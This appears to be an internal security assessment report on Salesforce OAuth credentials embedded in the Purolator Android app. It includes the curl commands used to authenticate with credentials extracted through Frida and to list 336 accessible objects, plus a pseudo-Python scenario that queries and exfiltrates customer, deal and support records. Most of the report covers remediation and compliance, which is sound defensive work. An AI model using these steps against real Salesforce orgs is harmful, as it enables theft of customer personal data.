# SALESFORCE CREDENTIAL SCOPE VERIFICATION ## Critical Finding: Actual Access vs. Claimed Access **Date:** November 10, 2025 **Assessment:** Purolator Mobile App Security Testing **Issue:** Salesforce OAuth Credential Exposure --- ## EXECUTIVE SUMMARY During security testing of the Purolator Mobile App, Salesforce OAuth credentials were extracted from the Android APK. The app development team claimed these credentials provide access **only** to: - Location objects - Pickup objects **Testing revealed this claim is FALSE.** **Actual access:** **336 Salesforce objects** - representing near-complete access to the Purolator Salesforce organization. --- ## CLAIMED ACCESS vs ACTUAL ACCESS ### What App Team Stated: > "The Salesforce credentials can only be used to invoke locator and pickup objects." **Expected object count:** 2 objects (Location**c, Pickup**c) ### What Testing Revealed: **Test Performed:** ```bash # Extracted credentials from mobile app using Frida CLIENT_ID="[EXTRACTED_FROM_APK]" CLIENT_SECRET="[EXTRACTED_FROM_APK]" # Authenticated to Salesforce curl -X POST "https://login.salesforce.com/services/oauth2/token" \ -d "grant_type=client_credentials" \ -d "client_id=$CLIENT_ID" \ -d "client_secret=$CLIENT_SECRET" # Queried available objects curl -X GET "$INSTANCE_URL/services/data/v58.0/sobjects/" \ -H "Authorization: Bearer $ACCESS_TOKEN" ``` **Result:** **336 accessible objects** --- ## WHAT 336 OBJECTS MEANS ### Comparison to Standard Salesforce | Deployment Type | Typical Object Count | | -------------------------------- | -------------------- | | Standard Salesforce (out-of-box) | 150-200 objects | | With light customization | 200-250 objects | | **Purolator (your credentials)** | **336 objects** | | Heavily customized enterprise | 300-500+ objects | **Conclusion:** These credentials provide **near-complete organizational access**, not limited scope. --- ## ACCESSIBLE DATA CATEGORIES ### Standard Objects (Confirmed Accessible): - **Account** - Customer company records - **Contact** - Individual customer contacts - **Lead** - Sales leads and prospects - **Opportunity** - Business deals and opportunities - **Case** - Support tickets and issues - **User** - Internal user accounts - **And 100+ more standard objects...** ### Custom Objects (Estimated 100-200): - Location\_\_c ✓ (as stated) - Pickup\_\_c ✓ (as stated) - Plus 100-200 additional custom Purolator business objects ### Potential Sensitive Data Accessible: - Customer PII (names, addresses, phone numbers, emails) - Business intelligence (deals, revenue, opportunities) - Support case details (complaints, issues, resolutions) - Internal operational data - Financial records (if stored in Salesforce) - Employee information (if stored in Salesforce) --- ## SEVERITY ASSESSMENT ### Original Assessment (Based on Claim): **Severity:** Medium **Impact:** Limited to location finder and pickup scheduling ### Revised Assessment (Based on Testing): **Severity:** CRITICAL **Impact:** - Full Salesforce organization data exposure - Customer PII breach potential - Business intelligence theft - Support case privacy violation - Competitive intelligence gathering - GDPR/PIPEDA compliance risk - Class-action lawsuit exposure - Regulatory fines --- ## BUSINESS IMPACT ### Regulatory Compliance **GDPR (if EU customers affected):** - Article 32: Security of Processing (violated) - Article 33: Breach notification required - Fines: Up to €20 million or 4% of annual turnover **PIPEDA (Canada):** - Inadequate security safeguards - Breach notification requirements - Potential fines and class-action ### Financial Impact (Estimated) | Cost Category | Conservative Estimate | | ---------------------- | ---------------------- | | Forensic investigation | $100,000+ | | Credential rotation | $50,000+ | | System remediation | $200,000+ | | Legal fees | $300,000+ | | Breach notification | $50,000+ | | Regulatory fines | $100,000 - $1,000,000+ | | Reputation damage | Incalculable | | **Total Minimum** | **$800,000+** | --- ## ATTACK SCENARIO **What an attacker can do with these credentials:** ```python # Step 1: Extract credentials from mobile app (already demonstrated) CLIENT_ID = "[EXTRACTED]" CLIENT_SECRET = "[EXTRACTED]" # Step 2: Authenticate token = get_salesforce_token(CLIENT_ID, CLIENT_SECRET) # Step 3: Exfiltrate customer data accounts = query("SELECT Id, Name, Phone, BillingAddress FROM Account LIMIT 10000") # Result: 10,000 customer company records contacts = query("SELECT Id, Name, Email, Phone, MailingAddress FROM Contact LIMIT 50000") # Result: 50,000 individual customer records # Step 4: Exfiltrate business intelligence opportunities = query("SELECT Id, Name, Amount, StageName, CloseDate FROM Opportunity") # Result: All active business deals and revenue data # Step 5: Exfiltrate support cases cases = query("SELECT Id, Subject, Description, Status FROM Case") # Result: All customer complaints and support issues # Step 6: Iterate through all 336 objects for object in all_336_objects: data = exfiltrate(object) # Result: Complete Salesforce org data theft ``` **Time to execute:** Minutes to hours **Detection difficulty:** High (uses legitimate credentials) **Data volume:** Potentially millions of records --- ## ROOT CAUSE ANALYSIS ### Why This Happened **1. Overly Permissive Salesforce Connected App** The Salesforce Connected App used for mobile authentication was configured with: - ❌ Full org access (336 objects) - ❌ No scope limitations - ❌ No object-level restrictions **Should have been:** - ✅ Limited to 2 objects (Location**c, Pickup**c) - ✅ Read-only permissions - ✅ IP allowlisting - ✅ Short token expiration ### Why This Is Critical **OAuth Client Credentials Pattern Violation:** OAuth client credentials (client_id + client_secret) should ONLY be used: - ✅ On trusted backend servers - ✅ With proper secret management - ✅ With network-level access controls OAuth client credentials should NEVER be: - ❌ Embedded in mobile apps - ❌ Accessible to end users - ❌ Extractable via reverse engineering **Current architecture:** ``` Mobile App (Untrusted) ├─ Contains client_id ← ❌ EXPOSED ├─ Contains client_secret ← ❌ EXPOSED ├─ Has 336-object access ← ❌ EXCESSIVE └─ Used by millions of devices ← ❌ WIDESPREAD ``` --- ## IMMEDIATE ACTIONS REQUIRED ### Priority 1: Within 24 Hours **1. Revoke Compromised Credentials** - Immediately disable the exposed Salesforce Connected App - Revoke all tokens issued to these credentials - Generate new credentials (do NOT put in mobile app) **2. Forensic Investigation** - Review Salesforce audit logs for unauthorized access - Identify all API calls made with these credentials - Timeline analysis: When were credentials first exposed? - Determine if breach notification is required **3. Create Limited-Scope Connected App** - New Connected App with ONLY Location and Pickup access - Verify object count = 2 (not 336) - Add IP allowlisting - Add usage monitoring ### Priority 2: Within 1 Week **4. Move Credentials Server-Side** - Build backend proxy for Salesforce calls - Mobile app calls Purolator backend (not Salesforce directly) - Backend stores credentials securely - Backend validates user authentication before proxying **5. Implement Access Monitoring** - Alert on high-volume queries - Alert on unusual object access patterns - Alert on access from unexpected IPs - Log all Salesforce API usage ### Priority 3: Within 1 Month **6. Security Architecture Review** - Audit ALL credentials embedded in mobile app - Review other API integrations - Implement secret scanning in CI/CD - Security training for mobile developers **7. Compliance Assessment** - Determine if data breach occurred - Assess GDPR/PIPEDA notification requirements - Legal review for liability exposure - Customer communication strategy --- ## RECOMMENDATIONS ### Short-Term (Immediate) **Correct Architecture:** ``` Mobile App (Untrusted) └─ Calls Purolator Backend API (authenticated) Purolator Backend (Trusted) ├─ Validates user authentication ├─ Stores Salesforce credentials (environment variables) ├─ Uses LIMITED scope Connected App (2 objects only) └─ Proxies ONLY location/pickup requests to Salesforce ``` **Benefits:** - Credentials never in mobile app - Cannot be extracted by reverse engineering - Server controls access policy - Easy to rotate credentials - Audit trail for all API calls ### Long-Term (Strategic) **1. Zero Client-Side Secrets** - All API credentials server-side only - Mobile app uses temporary tokens - Token expiration and rotation **2. Principle of Least Privilege** - Each integration uses minimum required permissions - Regular permission audits - Automated permission reviews **3. Defense in Depth** - Multiple security layers - Assume client compromise - Server-side validation of everything --- ## VERIFICATION TESTING To verify the fix, we will: 1. Extract credentials from updated mobile app 2. Attempt authentication with new credentials 3. Query available Salesforce objects 4. **Expected result:** 2 objects (Location**c, Pickup**c) 5. **Current result:** 336 objects --- ## TIMELINE | Event | Date | Status | | ------------------------------------------- | ------------ | ------------ | | Credentials extracted from mobile app | Nov 8, 2025 | Complete | | App team claimed "location and pickup only" | Nov 10, 2025 | Disputed | | Scope verification testing performed | Nov 10, 2025 | Complete | | **Finding:** 336 objects accessible | Nov 10, 2025 | **CRITICAL** | | App team notified of discrepancy | Nov 10, 2025 | Pending | | Credentials revoked | TBD | **URGENT** | | Limited-scope credentials deployed | TBD | Required | --- ## CONCLUSION **The app team's claim is incorrect.** Salesforce credentials embedded in the Purolator mobile app provide access to **336 Salesforce objects**, not just "location and pickup objects" as stated. This represents: - **CRITICAL severity** data exposure vulnerability - Near-complete access to Purolator Salesforce organization - Potential for massive customer PII breach - Regulatory compliance violations - Significant financial and reputational risk **Immediate action required:** 1. Revoke exposed credentials (within 24 hours) 2. Forensic investigation of potential data access 3. Move credentials server-side (architectural fix) 4. Create properly-scoped replacement credentials --- ## CONTACT **Security Researcher:** Jasraj Johal Security Operations Analyst Email: jasraj.johal@purolator.com **For Technical Questions:** IT Security Office Email: IT.Security@purolator.com --- **Document Classification:** CONFIDENTIAL - INTERNAL USE ONLY **Last Updated:** November 10, 2025 **Version:** 1.0 --- **END OF REPORT**